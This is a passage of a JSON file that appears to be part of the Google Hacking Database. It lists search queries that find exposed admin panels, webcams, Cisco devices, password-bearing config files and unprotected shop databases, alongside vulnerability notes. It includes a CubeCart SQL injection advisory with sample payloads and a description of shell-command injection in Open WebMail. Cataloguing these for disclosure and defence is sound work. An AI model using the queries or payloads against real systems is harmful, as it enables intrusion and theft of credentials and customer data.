sensible.  It is vulnerable for a full path disclosure.  http://www.securityfocus.com/bid/11301", "submited": "2004-10-05", "request": "\"Powered by AJ-Fork v.167\"", "id": 529}, {"short description": "\"Powered by Megabook *\" inurl:guestbook.cgi", "long description": "MegaBook is a web-based guestbook that is intended to run on Unix and  Linux variants. MegaBook is prone to multiple HTML injection vulnerabilities. http://www.securityfocus.com/bid/8065", "submited": "2004-10-05", "request": "\"Powered by Megabook *\" inurl:guestbook.cgi", "id": 530}, {"short description": "intitle:\"axis storpoint CD\" intitle:\"ip address\"", "long description": "Axis' network CD/DVD servers are faster, less costly and easier to manage than using full-blown file servers for networking CD/DVD collections. Any organization that relies heavily on CD/DVD-based information can benefit from an AXIS StorPoint CD+.", "submited": "2004-10-05", "request": "intitle:\"axis storpoint CD\" intitle:\"ip address\"", "id": 531}, {"short description": "intext:SQLiteManager inurl:main.php", "long description": "sQLiteManager is a tool Web multi-language of management of data bases SQLite.  # Management of several data base (Creation, access or upload basic)  # Management of the attached bases of donnes  # Creation, modification and removal of tables and index.  # Insertion, modification, suppression of recording in these tables", "submited": "2004-10-05", "request": "intext:SQLiteManager inurl:main.php", "id": 532}, {"short description": "intitle:\"oMail-admin Administration - Login\"  -inurl:omnis.ch", "long description": "oMail-webmail is a Webmail solution for mail servers based on qmail and optionally vmailmgr or vpopmail. The mail is read directly from maildirs on the hard disk, which is much quicker than using protocols like POP3 or IMAP. Other features includes multiple language support (English, French, German, Japanese, Chinese, and many more), HTML and pictures inline display, folders, and address book support.", "submited": "2004-10-05", "request": "intitle:\"oMail-admin Administration - Login\"  -inurl:omnis.ch", "id": 533}, {"short description": "inurl:\"map.asp?\" intitle:\"WhatsUp Gold\"", "long description": "\"WhatsUp Gold's new SNMP Viewer tool enables Area-Wide to easily track variables associated with any port on a network device. With a few simple clicks, a network engineer can select device ports, navigate trees, and graph variables in real time. For instance, Area-Wide can track bandwidth or CPU utilization on a router to aid in capacity and resource management.\"", "submited": "2004-10-05", "request": "inurl:\"map.asp?\" intitle:\"WhatsUp Gold\"", "id": 534}, {"short description": "inurl:\" WWWADMIN.PL\" intitle:\"wwwadmin\"", "long description": "wwwadmin.pl is a script that allows a user with a valid username and password, to delete files and posts from the associated forum.", "submited": "2004-10-06", "request": "inurl:\" WWWADMIN.PL\" intitle:\"wwwadmin\"", "id": 535}, {"short description": "inurl:odbc.ini ext:ini -cvs", "long description": "This search will show the googler ODBC client configuration files which may contain usernames/databases/ipaddresses and whatever.", "submited": "2004-10-09", "request": "inurl:odbc.ini ext:ini -cvs", "id": 536}, {"short description": "intitle:\"Web Data Administrator - Login\"", "long description": "The Web Data Administrator is a utility program implemented in ASP.NET that enables you to easily manage your SQL Server data wherever you are. Using its built-in features, you can do the following from Internet Explorer or your favorite Web browser. Create and edit databases in Microsoft SQL Server 2000 or Microsoft SQL Server 2000 Desktop Engine (MSDE) Perform ad-hoc queries against databases and save them to your file system Export and import database schema and data.", "submited": "2004-10-09", "request": "intitle:\"Web Data Administrator - Login\"", "id": 537}, {"short description": "intitle:\"Object not found\" netware \"apache 1..\"", "long description": "This search will show netware apache webservers as the result.", "submited": "2004-10-09", "request": "intitle:\"Object not found\" netware \"apache 1..\"", "id": 538}, {"short description": "intitle:\"switch home page\" \"cisco systems\" \"Telnet - to\"", "long description": "Most cisco switches are shipped with a web administration interface. If a switch is reachable from the internet and google cashed it this search will show it.", "submited": "2004-10-09", "request": "intitle:\"switch home page\" \"cisco systems\" \"Telnet - to\"", "id": 539}, {"short description": "intitle:\"DEFAULT_CONFIG - HP\"", "long description": "searches for the web interface of HP switches.", "submited": "2004-10-09", "request": "intitle:\"DEFAULT_CONFIG - HP\"", "id": 540}, {"short description": "\"Powered by yappa-ng\"", "long description": "yappa-ng is a very powerful but easy to install and easy to use online PHP photo gallery for all Operating Systems (Linux/UNIX, Windows, MAC, ...), and all Webservers (Apache, IIS, ...) with no need for a DataBase (no MySQL,...).yappa-ng is prone to a security vulnerability in the AddOn that shows a random image from any homepage. This issue may let unauthorized users access images from locked albums.http://www.securityfocus.com/bid/11314", "submited": "2004-10-09", "request": "\"Powered by yappa-ng\"", "id": 541}, {"short description": "\"Active Webcam Page\" inurl:8080", "long description": "Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting", "submited": "2004-10-09", "request": "\"Active Webcam Page\" inurl:8080", "id": 542}, {"short description": "inurl:changepassword.cgi -cvs", "long description": "Allows a user to change his/her password for authentication to the system.  Script allows for repeated failed attempts making this script vulnerable to brute force.", "submited": "2004-10-09", "request": "inurl:changepassword.cgi -cvs", "id": 543}, {"short description": "filetype:ini inurl:flashFXP.ini", "long description": "FlashFXP offers the easiest and fastest way to transfer any file using FTP, providing an exceptionally stable and robust program that you can always count on to get your job done quickly and efficiently. There are many, many features available in FlashFXP.The flashFXP.ini file is its configuration file and may contain usernames/passwords and everything else that is needed to use FTP.", "submited": "2004-10-10", "request": "filetype:ini inurl:flashFXP.ini", "id": 544}, {"short description": "inurl:shopdbtest.asp", "long description": "shopdbtest is an ASP page used by several e-commerce products. A vulnerability in the script allows remote attackers toview the database location, and since that is usually unprotected, the attacker can then download the web site's database by simly clicking on a URL (that displays the active database).   The page shopdbtest.asp is visible to all the users and contains the full configuration information. An attacker ca therefore download the MDB (Microsoft Database file), and gain access to sensitive information about orders, users, password, ect.", "submited": "2004-10-10", "request": "inurl:shopdbtest.asp", "id": 545}, {"short description": "\"Powered by A-CART\"", "long description": "A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database.  A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login-password).  http://www.securityfocus.com/bid/5597 (search SF for more)", "submited": "2004-10-10", "request": "\"Powered by A-CART\"", "id": 546}, {"short description": "\"Online Store - Powered by ProductCart\"", "long description": "ProductCart is \"an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites\". Multiple SQL injection vulnerabilities have been found in the product, they allow anything from gaining administrative privileges (bypassing the authentication mechanism), to executing arbitrary code. http://www.securityfocus.com/bid/8105 (search SF for more)", "submited": "2004-10-10", "request": "\"Online Store - Powered by ProductCart\"", "id": 547}, {"short description": "\"More Info about MetaCart Free\"", "long description": "MetaCart is an ASP based shopping Cart application with SQL database. A security vulnerability in the free demo version of the product (MetaCartFree) allows attackers to access the database used for storing user provided data (Credit cart numbers, Names, Surnames, Addresses, E-mails, etc).", "submited": "2004-10-10", "request": "\"More Info about MetaCart Free\"", "id": 548}, {"short description": "inurl:midicart.mdb", "long description": "MIDICART is s an ASP and PHP based shopping Cart application with MS Access and SQL database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, phone number, credit card number, and company name).", "submited": "2004-10-10", "request": "inurl:midicart.mdb", "id": 549}, {"short description": "camera linksys inurl:main.cgi", "long description": "Another webcam, Linksys style.", "submited": "2004-10-10", "request": "camera linksys inurl:main.cgi", "id": 550}, {"short description": "intitle:\"MailMan Login\"", "long description": "MailMan is a product by Endymion corporation that provides a web based interface to email via POP3 and SMTP. MailMan is very popular due to its amazingly easy setup and operation.  MailMan is written as a Perl CGI script, the version that is shipped to customers is obfuscated in an attempt to prevent piracy. The code contains several insecure calls to open() containing user specified data. These calls can be used to execute commands on the remote server with the permissions of the user that runs CGI scripts, usually the web server user that is in most cases 'nobody'.", "submited": "2004-10-11", "request": "intitle:\"MailMan Login\"", "id": 551}, {"short description": "intitle:\"my webcamXP server!\" inurl:\":8080\"", "long description": "\"my webcamXP server!\"Is there really an explantation needed?", "submited": "2004-10-11", "request": "intitle:\"my webcamXP server!\" inurl:\":8080\"", "id": 552}, {"short description": "(inurl:webArch/mainFrame.cgi ) | (intitle:\"web image monitor\" -htm -solutions)", "long description": "The Ricoh Aficio 2035 (fax/scanner) web interface.Attackers may read faxes and can get information like internal ip addresses.cleanup by: yeseins &amp; golfocleanup date: Apr 28, 2005original dork: inurl:webArch/mainFrame.cgi", "submited": "2004-10-11", "request": "(inurl:webArch/mainFrame.cgi ) | (intitle:\"web image monitor\" -htm -solutions)", "id": 553}, {"short description": "\"Powered by FUDforum\"", "long description": "FUDforum is a forums package. It uses a combination of PHP &amp; MySQL to create a portable solution that can run on virtually any operating system. FUDforum has two security holes that allow people to download or manipulate files and directories outside of FUDforum's directories. One of the holes can be exploited by everyone, while the other requires administrator access. The program also has some SQL Injection problems.  http://www.securityfocus.com/bid/5501", "submited": "2004-10-11", "request": "\"Powered by FUDforum\"", "id": 554}, {"short description": "\"BosDates Calendar System \" \"powered by BosDates v3.2 by BosDev\"", "long description": "\"BosDates is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least technical users.\"   There is a vulnerability in BosDates that allows an attacker to disclose sensitive information via SQL injection.", "submited": "2004-10-11", "request": "\"BosDates Calendar System \" \"powered by BosDates v3.2 by BosDev\"", "id": 555}, {"short description": "intitle:\"Lotus Domino Go Webserver:\" \"Tuning your webserver\" -site:ibm.com", "long description": "Domino Go Webserver is a scalable high-performance Web server that runs on a broad range of platforms. Domino Go Webserver brings you state-of-the-art security, site indexing capabilities, and advanced server statistics reporting. With Domino Go Webserver, you can speed beyond your competition by exploiting the latest advances in technology, such as Java, HTTP 1.1, and Web site content rating. Get all this and more in a Web server that's easy to install and maintain. --From the Lotus Domino Go Webserver web pag", "submited": "2004-10-12", "request": "intitle:\"Lotus Domino Go Webserver:\" \"Tuning your webserver\" -site:ibm.com", "id": 556}, {"short description": "intitle:\"Directory Listing, Index of /*/\"", "long description": "Vendor page:\"Einfache HTTP-Server-Software privates Homepage-Hosting oder Uploads.\" small HTTP server software for private hompage hosting or big uploads.", "submited": "2004-10-12", "request": "intitle:\"Directory Listing, Index of /*/\"", "id": 557}, {"short description": "intitle:\"error 404\" \"From RFC 2068 \"", "long description": "WebLogic Server Process Edition extends the functionality of the Application Server by converging custom app development with powerful Business Process Management (BPM) capabilities to provide an industrial strength, standards-based framework that enables the rapidly assembly of composite services, transforming existing infrastructure to a service oriented architecture-in a manageable phased approach.", "submited": "2004-10-12", "request": "intitle:\"error 404\" \"From RFC 2068 \"", "id": 558}, {"short description": "intitle:\"Open WebMail\" \"Open WebMail version (2.20|2.21|2.30) \"", "long description": "\"Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail\". A remote attacker can run arbitrary commands with the web server's privileges by exploiting an unfiltered parameter in userstat.pl.   Details  Vulnerable Systems:  * Open Webmail versions 2.20, 2.21 and 2.30  * Limited exploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below)   The vulnerability was discovered in an obsolete script named userstat. plshipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a \";\", \"|\" or \"( )\" followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands as an unprivileged user (the Apache user, \"nobody\" or \"www\", e.g.).", "submited": "2004-10-12", "request": "intitle:\"Open WebMail\" \"Open WebMail version (2.20|2.21|2.30) \"", "id": 559}, {"short description": "intitle:\"EMUMAIL - Login\" \"Powered by EMU Webmail\"", "long description": "The failure to strip script tags in emumail.cgi allows for XSS type of attack. Vulnerable systems:  * EMU Webmail version 5.0  * EMU Webmail version 5.1.0  Depending on what functions you throw in there, you get certain contents of the emumail.cgi file. The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. http://www.securityfocus.com/bid/9861", "submited": "2004-10-12", "request": "intitle:\"EMUMAIL - Login\" \"Powered by EMU Webmail\"", "id": 560}, {"short description": "intitle:\"WebJeff - FileManager\" intext:\"login\" intext:Pass|PAsse", "long description": "WebJeff-Filemanager 1.x  DESCRIPTION: A directory traversal vulnerability has been identified in WebJeff-Filemanager allowing malicious people to view the contents of arbitrary files.  The problem is that the \"index.php3\" file doesn't verify the path to the requested file. Access to files can be done without authorisation. http://www.securityfocus.com/bid/7995", "submited": "2004-10-12", "request": "intitle:\"WebJeff - FileManager\" intext:\"login\" intext:Pass|PAsse", "id": 561}, {"short description": "inurl:netw_tcp.shtml", "long description": "An Axis Network Camera captures and transmits live images directly over an IP network (e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera from a Web browser on any computer [..]", "submited": "2004-10-12", "request": "inurl:netw_tcp.shtml", "id": 562}, {"short description": "intitle:\"Object not found!\" intext:\"Apache/2.0.* (Linux/SuSE)\"", "long description": "This one detects apache werbservers (2.0.X/SuSE) with its error page.", "submited": "2004-10-12", "request": "intitle:\"Object not found!\" intext:\"Apache/2.0.* (Linux/SuSE)\"", "id": 563}, {"short description": "inurl:\"messageboard/Forum.asp?\"", "long description": "Multiple vulnerabilities have been found in GoSmart Message Board. A remote user can conduct SQL injection attack and Cross site scripting attack. http://www.securityfocus.com/bid/11361", "submited": "2004-10-13", "request": "inurl:\"messageboard/Forum.asp?\"", "id": 564}, {"short description": "intitle:\"Directory Listing\" \"tree view\"", "long description": "Dirlist is an ASP script that list folders in an explorer style:   * Tree  * Detailed  * Tiled   Quote:  *Lists files and directories in either a Tree, Detailed, or Tiled view.  *Can set a \"Starting Directory\". This can be a IIS Virtual Directory path.  *Displays file and directory properties.  *Can specify directories which you do not want to display and access.  *Can specify directories which you only want to display and access.  *Can specify what file-types to only display.  *Displays custom file-type icons. This can be turned off in the settings.  * 'Detailed' and 'tiled' views display a Breadcrumb bar for easier navigation. This can be turned off in the settings.", "submited": "2004-10-14", "request": "intitle:\"Directory Listing\" \"tree view\"", "id": 565}, {"short description": "inurl:default.asp intitle:\"WebCommander\"", "long description": "Polycom WebCommander gives you control over all aspects of setting up conferences on Polycom MGC MCUs. With Polycom WebCommander, scheduling and launching multipoint conferences, ad hoc meetings or future conferences is an easy, productive way to schedule meetings.", "submited": "2004-10-14", "request": "inurl:default.asp intitle:\"WebCommander\"", "id": 566}, {"short description": "intitle:\"Philex 0.2*\" -script -site:freelists.org", "long description": "Philex (phile 'file' explorer) is a web content manager based php   what philex can do ?  - easy navigation with tree structure  - create, delete, rename, copy and move folders/files.  - download files (normal or compressed :zip, gz, bz ).  - download many files as one compressed file.  - send files by email.  - upload local files to server", "submited": "2004-10-14", "request": "intitle:\"Philex 0.2*\" -script -site:freelists.org", "id": 567}, {"short description": "intitle:mywebftp \"Please enter your password\"", "long description": "MyWebFTP Free is a free lite version of MyWebFTP Personal - a PHP script providing FTP client capabilities with the user interface in your browser. Install it on a remote server and easily connect to your FTP servers through a firewall or a proxy not allowing FTP connections. No PHP built-in FTP support is required. Perform actions on many files at once. Password protected from casual surfers wasting your bandwidth. Nice look and feel is easy customizable.", "submited": "2004-10-14", "request": "intitle:mywebftp \"Please enter your password\"", "id": 568}, {"short description": "\"1999-2004 FuseTalk Inc\" -site:fusetalk.com", "long description": "Fusetalk forums (v4) are susceptible to cross site scripting attacks that can be exploited by passing a img src with malicious javascript.", "submited": "2004-10-15", "request": "\"1999-2004 FuseTalk Inc\" -site:fusetalk.com", "id": 569}, {"short description": "\"2003 DUware All Rights Reserved\"", "long description": "Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account.   DUclassmate may allow unauthorized remote attackers to gain access to a computer.   DUclassified is reported prone to multiple SQL injection vulnerabilities.   SQL injection issues also affect DUforum.   DUclassified and DUforum are also reported vulnerable to various unspecified HTML injection vulnerabilities.", "submited": "2004-10-16", "request": "\"2003 DUware All Rights Reserved\"", "id": 570}, {"short description": "\"WebExplorer Server - Login\" \"Welcome to WebExplorer Server\"", "long description": "WebExplorer Server is a web-based file management system for sharing files with user permissions and quota limits. It features easy user interface and online administration which will allow you to manage users/groups/permissions without the need of server configuration knowledge. It can be used for remote file storage(eg FreeDrive)/hosting services, Companies/Educational institutions that need to share documents among people.", "submited": "2004-10-16", "request": "\"WebExplorer Server - Login\" \"Welcome to WebExplorer Server\"", "id": 571}, {"short description": "intitle:\"ASP Stats Generator *.*\" \"ASP Stats Generator\" \"2003-2004 weppos\"", "long description": "ASP Stats Generator is a powerful ASP script to track web site activity. It combines a server side sniffer with a javascript system to get information about clients who are visiting your site.", "submited": "2004-10-16", "request": "intitle:\"ASP Stats Generator *.*\" \"ASP Stats Generator\" \"2003-2004 weppos\"", "id": 572}, {"short description": "\"Installed Objects Scanner\" inurl:default.asp", "long description": "Installed Objects Scanner makes it easy to test your IIS Webserver for installed components. Installed Objects Scanner also has descriptions and links for many components to let you know more on how using those components.   Just place the script on your server and view it in your browser to check your server for all currently known components.", "submited": "2004-10-16", "request": "\"Installed Objects Scanner\" inurl:default.asp", "id": 573}, {"short description": "intitle:\"remote assessment\" OpenAanval Console", "long description": "The Aanval Intrusion Detection Console is an advanced intrusion detection monitor and alerting system. Currently supporting modules for Snort and syslog - Aanval provides real-time monitoring, reporting, alerting and stability. Aanval's web-browser interface provides real-time event viewing and system/sensor management.", "submited": "2004-10-16", "request": "intitle:\"remote assessment\" OpenAanval Console", "id": 574}, {"short description": "ext:ini intext:env.ini", "long description": "This one shows configuration files for various applications. based on the application an attacker may find information like passwords, ipaddresses and more.", "submited": "2004-10-16", "request": "ext:ini intext:env.ini", "id": 575}, {"short description": "ezBOO \"Administrator Panel\" -cvs", "long description": "ezBOO WebStats is a high level statistical tool for web sites monitoring.  It allows real time access monitoring on several sites.  Based on php and mySQL it is easy to install and customization is made easy.  It works on Unix, Linux and Windows", "submited": "2004-10-16", "request": "ezBOO \"Administrator Panel\" -cvs", "id": 576}, {"short description": "\"This page has been automatically generated by Plesk Server Administrator\"", "long description": "Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.   Due to an input validation error in Plesk Server Administrator, it is possible for a remote attacker to make a specially crafted web request which will display PHP source code.   This is acheivable by connecting to a host (using the IP address rather than the domain name), and submitting a request for a known PHP file along with a valid username.  http://www.securityfocus.com/bid/3737", "submited": "2004-10-16", "request": "\"This page has been automatically generated by Plesk Server Administrator\"", "id": 577}, {"short description": "\"The script whose uid is \" \"is not allowed to access\"", "long description": "This PHP error message is revealing the webserver's directory and user ID.", "submited": "2004-10-16", "request": "\"The script whose uid is \" \"is not allowed to access\"", "id": 578}, {"short description": "filetype:php inurl:nqt intext:\"Network Query Tool\"", "long description": "Network Query Tool enables any Internet user to scan network information using:* Resolve/Reverse Lookup* Get DNS Records* Whois (Web)* Whois (IP owner)* Check port (!!!)* Ping host* Traceroute to host* Do it allThe author has been informed that the nqt form also accepts input from cross site pages, but he will not fix it.A smart programmer could use the port scan feature and probe al the nmap services ports. Though this would be slow, but it provides a higher degree of  anonymity, especially if the attacker is using a proxy or an Internet Cafe host to access the NQT pages.It gets even worse .. an attacker can scan the *internal* hosts of the networks that host NQT in many cases. Very dangerous.PS: this vulnerability was found early this year (search google for the full report), but was never added to the GHDB for some reason.", "submited": "2004-10-18", "request": "filetype:php inurl:nqt intext:\"Network Query Tool\"", "id": 579}, {"short description": "inurl:TiVoConnect?Command=QueryServer", "long description": "Tivo is a the digital replacement for your analog videorecorder. It's a digital media system that amongst other things allows recording tv shows to a hard disk. More information is available at http://www.tivo.com.This search was found in one of those cgi scanning tools out there. Currently there are only two results and only the first responds with information like this:1.0Sat Oct 16 15:26:46 EDT 2004JavaHMO1.0Leon Nicholls-This is an official build. Identifier: 2003.03.25-1612 Last Change: 112792In the future vulnerabilities may be found in this software. For now an attacker can enjoy the mp3 stream it provides (copy the server:port in winamp or xmms).", "submited": "2004-10-18", "request": "inurl:TiVoConnect?Command=QueryServer", "id": 580}, {"short description": "ext:mdb inurl:*.mdb  inurl:fpdb shop.mdb", "long description": "The directory \"http:/xxx/fpdb/\" is the database folder used by some versions of FrontPage. It contains many types of Microsoft Access databases.One of them is Metacart, who used \"shop.mdb\" as their default name. It contains customer info like phone numbers but also plain text passwords. A screenshot is available at ImageShack: http://img49.exs.cx/img49/7673/shopmdb.jpgThree results only at time of writing. Remove the shop.mdb part to see the complete list of databases.", "submited": "2004-10-18", "request": "ext:mdb inurl:*.mdb  inurl:fpdb shop.mdb", "id": 581}, {"short description": "inurl:cgi-bin/testcgi.exe \"Please distribute TestCGI\"", "long description": "Test CGI by Lilikoi Software aids in the installation of the Ceilidh discussion engine for the World Wide Web. An attacker can use this to gather information about the server like: Operating System, IP and the full docroot path.", "submited": "2004-10-18", "request": "inurl:cgi-bin/testcgi.exe \"Please distribute TestCGI\"", "id": 582}, {"short description": "inurl:ttt-webmaster.php", "long description": "Turbo traffic trader Nitro v1.0 is a free, fully automated traffic trading script. Multiple vulnerabilities were found.Vulnerability report: http://www.securityfocus.com/bid/11358Vendor site: http://www.turbotraffictrader.com/php", "submited": "2004-10-19", "request": "inurl:ttt-webmaster.php", "id": 583}, {"short description": "intitle:\"DVR Web client\"", "long description": "This embedded DVR is quick plug and play. Just plug it in and it will start recording. You can view all the cameras at once or one at a time. Allows individual pictures to come up on play back or all together. The best feature is the ability to connect via a network and play back existing stored video or view images live.* Four Channel Input* Horizontal Resolution 480 Lines* 16.7 Million Color Output* Display In Quad or Single Image (Full MultiPlex)* Motion Detection* Scheduling* Zoom in Live and Playback* 720H X 480V (Full) 360H X 240V In Quad* 0.1 FPS Thru 15 FPS each camera (60 FPS Total)* Web Interface TCP/IP With Client Software* Back-Up With Mark Image, VCR, Time Lapse, Remote Client Software* Full Remote Camera Controls (PTZ), Alarms, Wiper, Fans, Etc.", "submited": "2004-10-19", "request": "intitle:\"DVR Web client\"", "id": 584}, {"short description": "intitle:\"ASP FileMan\" Resend -site:iisworks.com", "long description": "FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database. Default user: user=admin, pass=passIn the default installation a diagnostigs page calleddiags.asp exists the manual recommends to delete it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can be downloaded and the passwords are not encrypted.Site admins have been notified. As always: DO NOT ABUSE THIS.", "submited": "2004-10-19", "request": "intitle:\"ASP FileMan\" Resend -site:iisworks.com", "id": 585}, {"short description": "intitle:\"index.of *\" admin news.asp configview.asp", "long description": "With Compulive News you can enter the details of your news items onto a webform and upload images through your browser. It integrates seamlessly within your website.When you open your CNU5 zip there is a news folder created with three subfolders: htmlarea, images and admin. In the news folder is your database file. For security purposes the manual recommends that you immediately rename this database to a name of your own choosing thereby making it harder for anyone to download your news database.The database contains the plain text password. PS: this search is based on the index of method. There are other ways to find this software, but finding the news database becomes a lot more difficult for an attacker that way.", "submited": "2004-10-19", "request": "intitle:\"index.of *\" admin news.asp configview.asp", "id": 586}, {"short description": "\"Copyright 2002 Agustin Dondo Scripts\"", "long description": "CoolPHP has multiple vulnerabilities:* Cross-Site Scripting vulnerability (index.php)* A Path Disclosure Vulnerability (index.php)* Local file include Vulnerability with Directory Traversal info: http://www.securityfocus.com/archive/1/378617", "submited": "2004-10-19", "request": "\"Copyright 2002 Agustin Dondo Scripts\"", "id": 587}, {"short description": "\"IMail Server Web Messaging\" intitle:login", "long description": "IMail Server from Ipswitch is a messaging solution with 60 million users worldwide. It contains the features and safeguards you need without the complexity of expensive solutions like Microsoft Exchange or groupware which challenges even the most experienced administrators.This is a login portal search. Security Focus shows a list of vulnerabilities about this software.", "submited": "2004-10-19", "request": "\"IMail Server Web Messaging\" intitle:login", "id": 588}, {"short description": "intitle:\"Directory Listing For\" intext:Tomcat -intitle:Tomcat", "long description": "The Google Hackers Guide explains how to find Apache directory indexes, which are the most common found on the Internet. There are other ways however.This query is a generic search for servers using Tomcat with directory listings enabled. They are a bit more fancy than Apache's default lists and more importantly they will not be found using \"index.of\".", "submited": "2004-10-19", "request": "intitle:\"Directory Listing For\" intext:Tomcat -int", "id": 589}, {"short description": "site:.viewnetcam.com -www.viewnetcam.com", "long description": "The FREE viewnetcam.com service allows you to create a personal web address (e.g., http://bob.viewnetcam.com) at which your camera's live image can be found on the Internet. How the camera and service works: Special Software embedded within your Panasonic Network Camera gives your camera the ability to locate your unique Internet address. No matter what kind of Internet connection you have or which Internet provider you use, the viewnetcam.com service will keep your camera's Internet address permanent.", "submited": "2004-10-19", "request": "site:.viewnetcam.com -www.viewnetcam.com", "id": 590}, {"short description": "inurl:/cgi-bin/finger? Enter (account|host|user|username)", "long description": "The finger command on unix displays information about the system users. This search displays the webinterface for that command.", "submited": "2004-10-19", "request": "inurl:/cgi-bin/finger? Enter (account|host|user|username)", "id": 591}, {"short description": "inurl:/cgi-bin/finger? \"In real life\"", "long description": "The finger command on unix displays information about the system users. This search displays pre-fingered users, so an attacker wouldn't even have to guess their accounts.", "submited": "2004-10-19", "request": "inurl:/cgi-bin/finger? \"In real life\"", "id": 592}, {"short description": "inurl:\"calendar.asp?action=login\"", "long description": "aspWebCalendar is a browser based software package that runs over a standard web browser, such as Internet Explorer from Microsoft, and allows an organization of any size to easily and cost effectively provide personal and group calendar functions to everyone in the organization.A vulnerability has been found for the (SQL version) script family from Full Revolution. Affected software is: aspWebAlbum, aspWebCalendar, aspWebHeadlines, aspWebMail. You can check it here: http://www.securityfocus.com/bid/11246Searches for aspWebAlbum and aspWebHeadlines:inurl:\"album.asp?action=login\"inurl:\"news.asp?action=login\"", "submited": "2004-10-06", "request": "inurl:\"calendar.asp?action=login\"", "id": 593}, {"short description": "\"Powered by CubeCart\"", "long description": "--------------------------------------------------------Full path disclosure and sql injection on CubeCart 2.0.1--------------------------------------------------------[1]Introduction[2]The Problem[3]The Solution[4]Timeline[5]Feddback##############################################################[1]Introduction\"CubeCart is an eCommerce script written with PHP &amp; MySQL. With CubeCart you can setup a powerful online store as long as youhave hosting supporting PHP and one MySQL database.\"This info was taken from hxxp://www.cubecart.comCubeCart, from Brooky (hxxp://www.brooky.com), is a software formerly known as eStore.[2]The ProblemA remote user can cause an error in index.php using the parameter 'cat_id' which is not properly validated, displaying thesoftware's full installation path. It can also be used to inject sql commands. Examples follow:(a) http://example.com/store/index.php?cat_id='causes an error like this:\"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/link_navi.php on line 35Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 170Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 172\"(b) http://example.com/store/index.php?cat_id=1 or 1=1--displays all categories in the database[3]The SolutionNone at this time.Vendor contacted and fix will be avaliable soon.[4]Timeline(2/10/2004) Vulnerability discovered(2/10/2004) Vendor notified(3/10/2004) Vendor response[5]FeedbackComments and stuff to cybercide@megamail.pt", "submited": "2004-10-19", "request": "\"Powered by CubeCart\"", "id": 594}, {"short description": "inurl:confixx inurl:login|anmeldung", "long description": "Confixx is a webhosting management tool and has the following features: * create resellers, * edit personal data, * manage newsletters to resellers, * comprehensive stats, * powerful evaluation of traffic, * manage e-mail templates, * lock resellers. security focus has a vulnerability report on this.vendor: http://www.sw-soft.com/en/products/confixx/", "submited": "2004-10-19", "request": "inurl:confixx inurl:login|anmeldung", "id": 595}, {"short description": "\"VHCS Pro   ver\" -demo", "long description": "VHCS is professional Control Panel Software for Shared, Reseller, vServer and Dedicated Servers.No vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "\"VHCS Pro   ver\" -demo", "id": 596}, {"short description": "intitle:\"Virtual Server Administration System\"", "long description": "VISAS, German control panel software like confixx.No vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "intitle:\"Virtual Server Administration System\"", "id": 597}, {"short description": "\"SysCP - login\"", "long description": "sysCP: Open Source server management tool for Debian LinuxNo vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "\"SysCP - login\"", "id": 598}, {"short description": "intitle:\"ISPMan : Unauthorized Access prohibited\"", "long description": "ISPMan is a distributed system to manage components of ISP from a central management interface.No vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "intitle:\"ISPMan : Unauthorized Access prohibited\"", "id": 599}, {"short description": "\"Login - Sun Cobalt RaQ\"", "long description": "The famous Sun linux appliance. Nice clean portal search.Various vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "\"Login - Sun Cobalt RaQ\"", "id": 600}, {"short description": "\"OPENSRS Domain Management\" inurl:manage.cgi", "long description": "OpenSRS Domain Management SystemNo vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "\"OPENSRS Domain Management\" inurl:manage.cgi", "id": 601}, {"short description": "intitle:plesk inurl:login.php3", "long description": "Plesk is server management software developed for the Hosting Service Industry. Various vulnerabilities are reported to security focus.", "submited": "2004-10-20", "request": "intitle:plesk inurl:login.php3", "id": 602}, {"short description": "inurl:\"level/15/exec/-/show\"", "long description": "This search finds Cisco devices which have level 15 access open via webinterface. If an attacker wants to search for another level he can replace the \"15\" with this level. Levels below 10 need a leading zero (e.g. 04).Currently only the cached pages can be viewed.", "submited": "2004-10-20", "request": "inurl:\"level/15/exec/-/show\"", "id": 603}, {"short description": "inurl:/dana-na/auth/welcome.html", "long description": "Neoteris Instant Virtual Extranet (IVE) has been reported prone to a cross-site scripting vulnerability.The issue presents itself, due to a lack of sufficient sanitization performed on an argument passed to an IVE CGI script. An attacker may exploit this vulnerability to hijack valid Neoteris IVE sessions.advisories: http://secunia.com/product/1558/http://www.securityfocus.com/bid/7510", "submited": "2004-10-20", "request": "inurl:/dana-na/auth/welcome.html", "id": 604}, {"short description": "ext:nsf nsf -gov -mil", "long description": "Domino is server technology which transforms Lotus Notes into an Internet applications server. Domino 